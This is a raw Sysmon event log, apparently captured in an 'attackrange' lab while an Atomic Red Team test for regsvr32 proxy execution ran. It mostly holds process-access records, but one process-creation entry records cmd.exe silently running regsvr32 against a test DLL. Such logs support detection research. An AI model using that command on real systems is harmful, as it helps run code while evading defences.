22:12:48.108{8e433fbf-2a44-6013-1100-000000001100}111610484C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360467Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.108{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360466Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360465Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a003-000000001100}13124532C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1ca30|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000360464Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a003-000000001100}13124532C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1c8fa|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000360463Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360462Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a003-000000001100}13124532C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+1c8c2|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf 10341000x8000000000000000360461Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a003-000000001100}13124532C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+2976b|c:\windows\system32\capabilityaccessmanager.dll+1c7d5|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000360460Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a003-000000001100}13124532C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+28ff4|c:\windows\system32\capabilityaccessmanager.dll+1c666|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000360459Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360458Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360457Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360456Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a203-000000001100}72563392C:\Windows\system32\cmd.exe{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\syswow64\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+b638|C:\Windows\system32\cmd.exe+ab91|C:\Windows\system32\cmd.exe+b638|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360455Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.999{8e433fbf-36df-6013-a303-000000001100}5408C:\Windows\SysWOW64\regsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dllC:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=EB3B90B6989227F590BB36356DF96A30,SHA256=F80B4224C670E76E05A70CC5403818B11C7A4CA10542A1F9B5D935E4FCA08579,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Windows\system32\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" 10341000x800000000000000032890Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.913{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032889Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.913{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7803-00000000A401}2052C:\Windows\SysWOW64\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032888Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.913{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7903-00000000A401}2324C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032887Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:49.913{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36E1-6013-7903-00000000A401}2324C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000361123Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.503{00000000-0000-0000-0000-000000000000}10200raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;<unknown process> 10341000x8000000000000000361122Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361121Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000361120Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361119Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361118Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361117Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361116Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361115Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.546{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 